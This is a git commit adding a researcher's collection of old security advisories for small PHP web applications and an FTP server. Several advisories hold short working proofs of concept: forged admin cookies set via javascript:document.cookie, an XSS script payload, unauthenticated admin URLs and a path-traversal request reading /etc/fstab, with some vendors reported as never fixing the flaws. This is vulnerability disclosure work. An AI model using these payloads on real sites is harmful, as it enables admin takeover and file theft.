Updating README for public release. - advisories - Security advisories that I have released to the public.
(DIR) Log
(DIR) Files
(DIR) Refs
(DIR) README
---
(DIR) commit 16b8a1f3cce6a98f8e31c667a56b73f5ac826960
(HTM) Author: Jay Scott <me@jay.scot>
Date: Thu, 15 Apr 2010 20:08:34 +0100
Updating README for public release.
Diffstat:
A README | 11 +++++++++++
A arcade-trade-script-exploit.txt | 68 +++++++++++++++++++++++++++++++
A aterr-exploits.txt | 101 +++++++++++++++++++++++++++++++
A big-lick-mailing-list.txt | 23 +++++++++++++++++++++++
A big-lick-website-backup.txt | 51 +++++++++++++++++++++++++++++++
A filecopa-exploit.txt | 65 +++++++++++++++++++++++++++++++
A million-dollar-text-links-exploit.… | 62 +++++++++++++++++++++++++++++++
A php-siteLock-exploit.txt | 74 +++++++++++++++++++++++++++++++
A star-articles-exploit.txt | 67 +++++++++++++++++++++++++++++++
9 files changed, 522 insertions(+), 0 deletions(-)
---
(DIR) diff --git a/README b/README
@@ -0,0 +1,11 @@
+
+ __ __ __ __ ___ __
+ /\ | \ \ / | /__` / \ |__) | |__ /__`
+/~~\ |__/ \/ | .__/ \__/ | \ | |___ .__/
+
+---
+
+
+This repo contains various security-related advisories I have released
+over the years. Most of the public releases are web application-based,
+with the odd remote buffer overflow exploit.
(DIR) diff --git a/arcade-trade-script-exploit.txt b/arcade-trade-script-exploit.txt
@@ -0,0 +1,68 @@
+
+
+ Arcade Trade Script
+ Insecure Cookie Handling
+ ===========================
+
+
+
+
+ SUMMARY
+ ________
+
+ Arcade Trade Script is a full arcade site CMS (Content Management System)
+ with easy customization and advanced traffic trading system built in.
+ With ATS you will hardly ever have to FTP anything. Almost all files,
+ pages, and meta tags can be edited from the admin panel. ATS is extremely
+ easy to use and works for both regular arcades and full blown traffic
+ trading arcades.
+
+ Please note that this issue has now been fixed!
+
+
+
+ IMPACT
+ _______
+
+ Leads to full administration rights on the CMS admin panel.
+
+
+
+ VERSIONS
+ _________
+
+ Vulnerable systems: ATS versions prior to 1.0
+
+ Immune systems: None
+
+
+
+ DESCRIPTION #1
+ ______________
+
+ Insecure cookie handling allows anyone to simply create a custom cookie
+ with the values below. This will allow full access to the admin panel.
+
+ Name - adminLoggedIn
+ Content - true
+ Path - /
+
+
+ Proof of Concept:
+ -> javascript:document.cookie="adminLoggedIn=true; path=/"
+
+ Fix:
+ -> None given.
+
+
+
+ ADDITIONAL INFO
+ _______________
+
+
+ Vendor URL - www.arcadetradescript.com
+ Underlying OS - Linux (Any), UNIX (Any), Windows (Any)
+ Credit - Jay Scott
+ Message History - Vendor notifyied and problem fixed
+ the following day.
+
(DIR) diff --git a/aterr-exploits.txt b/aterr-exploits.txt
@@ -0,0 +1,101 @@
+Aterr Forums Multiple Vulnerabilities
+
+
+
+SUMMARY
+--------
+
+Aterr is a threaded forum system allowing registered visitors to express
+their opinions, discuss topics, and debate with other visitors. A threaded
+forum system differs from regular, flat forum systems in that once posted,
+a thread can fork, allowing visitors to reply directly to other posts. aterr
+also provides a customisable permissions system, the ability to nest forums,
+and moderation tools.
+
+
+
+IMPACT
+-------
+
+Can lead to Disclosure of system information, Disclosure of user information
+and Modification of forum setup.
+
+
+
+VERSIONS
+---------
+
+Vulnerable systems:
+ * Aterr versions prior to 0.4
+
+Immune systems:
+ * Aterr version 0.5
+
+
+
+DESCRIPTION #1 - Modification of Forum Setup
+--------------
+
+The file forums.php fails to check that an administrator has the correct
+privileges to log into the admin panel and edit the forum setup such as
+changing the logo, title etc.
+
+
+Proof of Concept:
+
+ www.yoursite.com/forums/forums.php?op=admin&sub=config
+
+Fix:
+
+Add the following too forums.php starting at line 1393 :
+
+ 1393 : if (!permission::has_flag('forums', F_FORUM_EDIT))
+ 1394 : {
+ 1395 : redirect('http://' . $config['domain_name'] . $config['install_path'] . forums::furl('admin'));
+ 1396 : }
+
+
+
+DESCRIPTION #2 - Disclosure of User Information
+--------------
+
+Not filtering HTML of the Topic header allows XSS exploits to be added to
+any forum post.
+
+
+Proof of Concept:
+
+Enter the following as a topic header:
+ <script>alert(document.cookie); </script>
+
+FIX:
+
+None given, upgrade to new version.
+
+
+
+DESCRIPTION #3 - Disclosure of System Information
+--------------
+
+No check is made to see if a vaild profile has been selected. When a invaild
+profile has been requested the forum discloses full path information to the
+user.
+
+
+Proof of Concept:
+
+ www.yoursite.com/forums/accounts.php?op=viewprofile&u=
+
+FIX:
+
+None given, upgrade to new version.
+
+
+ADDITIONAL INFORMATION
+-----------------------
+
+Vendor URL - http://chimaera.starglade.org
+Underlying OS - Linux (Any), UNIX (Any), Windows (Any)
+Credit - Jay Scott
+Message History - None
+
(DIR) diff --git a/big-lick-mailing-list.txt b/big-lick-mailing-list.txt
@@ -0,0 +1,23 @@
+
+
+Name Big Lick Media: Mailing List
+Severity High
+Vendor www.biglickmedia.com
+Authors Jay Scott
+Date 10th Jan 2009
+Status Vendor has NOT been informed
+
+
+DESCRIPTION
+
+Poor coding allows anyone to download a file on the host without
+requiring authentication.
+
+
+EXPLOIT
+
+Simply go to the following address in a web browser. Change the file
+variable to the file you wish to download.
+
+<path to application>/dl.php?file=/etc/fstab
+
(DIR) diff --git a/big-lick-website-backup.txt b/big-lick-website-backup.txt
@@ -0,0 +1,51 @@
+
+
+Name Big Lick Media: Website Backup
+Severity High
+Vendor www.biglickmedia.com
+Authors Jay Scott
+Date 10th Jan 2009
+Status Vendor has NOT been informed
+
+
+DESCRIPTION
+
+Poor coding allows anyone to download a file on the host without
+requiring authentication.
+
+
+EXPLOIT
+
+Simply go to the following address in a web browser. Change the file
+variable to the file you wish to download.
+
+<path to application>/download.php?file=/etc/fstab
+
+
+VULNERABLE CODE
+
+$filename = $_GET['file'];
+
+// required for IE, otherwise Content-disposition is ignored
+if(ini_get('zlib.output_compression'))
+ ini_set('zlib.output_compression', 'Off');
+
+$file_extension = strtolower(substr(strrchr($filename,"."),1));
+
+switch( $file_extension )
+{
+ case "gz": $ctype="application/x-gzip"; break;
+ case "zip": $ctype="application/zip"; break;
+ default: $ctype="application/download";
+}
+header("Pragma: public"); // required
+header("Expires: 0");
+header("Cache-Control: must-revalidate, post-check=0, pre-check=0");
+header("Cache-Control: private",false); // required for certain browsers
+header("Content-Type: $ctype");
+header("Content-Disposition: attachment; filename=\"".basename($filename)."\";" );
+header("Content-Transfer-Encoding: binary");
+header("Content-Length: ".filesize($filename));
+readfile("$filename");
+exit();
+
(DIR) diff --git a/filecopa-exploit.txt b/filecopa-exploit.txt
@@ -0,0 +1,65 @@
+FileCOPA FTP Server
+
+
+
+SUMMARY
+--------
+
+FileCOPA takes the hard work out of running an FTP Server. The FileCOPA
+FTP Server Software installs on any version of the Microsoft Windows
+operating system with just a few clicks of the mouse and automatically
+configures itself for anonymous operation.
+
+
+
+IMPACT
+-------
+
+Can lead to Denial of Service Attack and remote system access.
+
+
+
+VERSIONS
+---------
+
+Vulnerable systems:
+ * Unknown version number.
+ * Version released 10/11/2005
+
+Immune systems:
+ * Version released after 28/11/2005
+
+
+
+DESCRIPTION
+------------
+
+FileCOPA fails to check the CWD buffer the length of the input in
+the CMD FTP command. If you pass 1036 characters to CWD it will crash
+the FTP server allowing no more connections to the service.
+
+
+Proof of Concept:
+
+ POC C code for a DOS attack and remote access exploit was given
+ to the vendor. The POC is not for public release.
+
+
+Fix:
+
+ Upgrade to latest version.
+
+
+
+
+ADDITIONAL INFORMATION
+-----------------------
+
+Vendor URL - http://www.filecopa.com/
+Underlying OS - Windows (Any)
+Credit - Jay Scott
+
+History - 18/11/05 - Vendor Contacted
+ - 19/11/05 - Vendor Acknowledged
+ - 21/11/05 - New version released
+
(DIR) diff --git a/million-dollar-text-links-exploit.txt b/million-dollar-text-links-exploit.txt
@@ -0,0 +1,62 @@
+
+
+ Million Dollar Text Links
+ Authentication bypass
+ ===========================
+
+
+
+
+ APP SUMMARY
+ ____________
+
+ Now that the market is overcrowded with million dollar graphic
+ pages where the users get links back to their site, here is how
+ you can add your "twist" to encash the million dollar craze.
+ Use this script to generate adsense revenue, promote your
+ links, get backward links to your site or simply to manage your
+ link exchange.
+
+
+
+ IMPACT
+ _______
+
+ Leads to full administration rights of the admin panel.
+
+
+
+ VERSIONS
+ _________
+
+ Vulnerable systems: All versions
+
+ Immune systems: None
+
+
+
+ DESCRIPTION #1
+ ______________
+
+ No authentication checks on the admin home page allows anyone to
+ just browse to the admin contol panel and bypass the login
+ procedure.
+
+
+ Proof of Concept:
+ -> http://www.kalptarudemos.com/demo/million/admin.home.php
+
+ Fix:
+ -> None given.
+
+
+
+ ADDITIONAL INFO
+ _______________
+
+
+ Vendor URL - http://www.cmsnx.com/product.about.php?id=12
+ Underlying OS - Linux (Any), UNIX (Any), Windows (Any)
+ Credit - Jay Scott
+ Message History - Vendor Contacted.
+ No reply after 30 days
(DIR) diff --git a/php-siteLock-exploit.txt b/php-siteLock-exploit.txt
@@ -0,0 +1,74 @@
+
+
+ PHP SiteLock
+ Insecure Cookie Handling
+ ===========================
+
+
+
+
+ SUMMARY
+ ________
+
+ PHP Site Lock: A highly secure website login script which has
+ features like User Authentication & Management, Website
+ Password Protection , protection of pdf , images , etc.
+
+
+
+ IMPACT
+ _______
+
+ Leads to full administration rights of the admin panel.
+
+
+
+ VERSIONS
+ _________
+
+ Vulnerable systems: All versions
+
+ Immune systems: None
+
+
+
+ DESCRIPTION #1
+ ______________
+
+ Insecure cookie handling allows anyone to simply create a custom cookie
+ with the values below. This will allow full access to the admin panel.
+
+ Name - user_type
+ Content - admin
+ Path - /
+
+ Name - login_name
+ Content - admin
+ Path - /
+
+ Name - login_id
+ Content - 0
+ Path - /
+
+
+ Proof of Concept:
+ -> javascript:document.cookie="user_type=admin; path=/"
+ -> javascript:document.cookie="login_name=admin; path=/"
+ -> javascript:document.cookie="login_id=0; path=/"
+
+ Fix:
+ -> None given.
+
+
+
+ ADDITIONAL INFO
+ _______________
+
+
+ Vendor URL - www.phpsitelock.com
+ Underlying OS - Linux (Any), UNIX (Any), Windows (Any)
+ Credit - Jay Scott
+ Message History - Vendor Contacted.
+ No reply after 30 days
+
+
(DIR) diff --git a/star-articles-exploit.txt b/star-articles-exploit.txt
@@ -0,0 +1,67 @@
+
+
+ Star Articles
+ Insecure Cookie Handling
+ ===========================
+
+
+
+
+ SUMMARY
+ ________
+
+ Ready to use article, news, joke, tutorial site script with
+ more features than you can think of . . . Manage a large
+ collection of articles, jokes , tutorials and anything else
+ for your niche and get features like automatic RSS
+ generation , easy contents syndication , automated link
+ exchange and everything else (Including inbuilt 13 POWERFUL
+ SEO TOOLS)that MAKES YOUR LIFE EASY.
+
+
+ IMPACT
+ _______
+
+ Leads to full administration rights on the CMS admin panel.
+
+
+
+ VERSIONS
+ _________
+
+ Vulnerable systems: Versions prior to 5.0
+
+ Immune systems: None
+
+
+
+ DESCRIPTION #1
+ ______________
+
+ Insecure cookie handling allows anyone to simply create a custom cookie
+ with the values below. This will allow full access to the admin panel.
+
+ Name - admin_user
+ Content - admin
+ Path - /
+
+
+ Proof of Concept:
+ -> javascript:document.cookie="admin_user=admin; path=/"
+
+ Fix:
+ -> None given.
+
+
+
+ ADDITIONAL INFO
+ _______________
+
+
+ Vendor URL - www.stararticles.com
+ Underlying OS - Linux (Any), UNIX (Any), Windows (Any)
+ Credit - Jay Scott
+ Message History - No response from vendor after
+ 30 days.
+
+